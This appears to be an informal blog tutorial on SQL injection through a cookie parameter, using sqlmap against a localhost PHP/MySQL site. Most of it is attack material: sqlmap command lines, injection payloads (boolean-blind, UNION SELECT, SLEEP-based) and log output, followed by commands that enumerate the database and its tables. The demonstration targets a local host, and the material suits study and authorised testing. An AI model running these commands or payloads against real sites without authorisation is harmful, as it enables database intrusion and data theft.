well this is been out there for a while now . but still I thought of writing a simple tut of SQL Injection trough cookies
What are Cookies ?
A cookie is a message given to a Web browser by a Web server. The browser stores the message in a text file. The message is then sent back to the server each time the browser requests a page from the server. for a example mostly cookies are used to keep a user logged in without making him logging every each time he refreshes the web page
at the moment our current target Cookie Value is the following
PHPSESSID=b53vsia3006i1oe0ucmp8t2j20; user_id=1
SQL Injection With sqlmap
for this example I’ve used sqlmap sql injector which is a very advance sql injector . the vulnerable cookie parameter is “user_id”
Vulnerbility Identifying
root@core-VPCCW16FB:# ./sqlmap.py --cookie="PHPSESSID=b53vsia3006i1oe0ucmp8t2j20; user_id=1" -u "http://localhost/index.php" -p"user_id" --level 3 --dbms=MYSQL
sqlmap/1.0-dev (r5108) - automatic SQL injection and database takeover tool
http://www.sqlmap.org
....
[11:30:45] [INFO] heuristic test shows that Cookie parameter 'user_id' might be injectable (possible DBMS: MySQL)
[11:30:45] [INFO] testing sql injection on Cookie parameter 'user_id'
[11:30:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:30:45] [INFO] Cookie parameter 'user_id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[11:30:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[11:30:46] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
[11:30:46] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
[11:30:46] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
[11:30:46] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[11:30:46] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[11:30:46] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[11:30:46] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[11:30:56] [INFO] Cookie parameter 'user_id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[11:30:56] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[11:30:56] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other injection technique found
[11:30:56] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[11:30:56] [INFO] target url appears to have 3 columns in query
[11:30:56] [INFO] Cookie parameter 'user_id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
Cookie parameter 'user_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 30 HTTP(s) requests:
---
Place: Cookie
Parameter: user_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: PHPSESSID=b53vsia3006i1oe0ucmp8t2j20; user_id=1 AND 8697=8697
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: PHPSESSID=b53vsia3006i1oe0ucmp8t2j20; user_id=1 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a676d7a3a,0x595844575a4975764376,0x3a6972633a), NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: PHPSESSID=b53vsia3006i1oe0ucmp8t2j20; user_id=1 AND SLEEP(5)
---
[11:30:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL 5.0.11
Current Database
./sqlmap.py --cookie="PHPSESSID=b53vsia3006i1oe0ucmp8t2j20; user_id=1" -u "http://localhost/index.php" -p"user_id" --current-db ... current database: 'test'
Table List
./sqlmap.py --cookie="PHPSESSID=b53vsia3006i1oe0ucmp8t2j20; user_id=1" -u "http://localhost/index.php" -p"user_id" --tables -D'test' ... Database: test [1 table] +------+ | test | +------+
and it will keep on going like the normal SQL Injection
Cya ..
CoreNumb Security 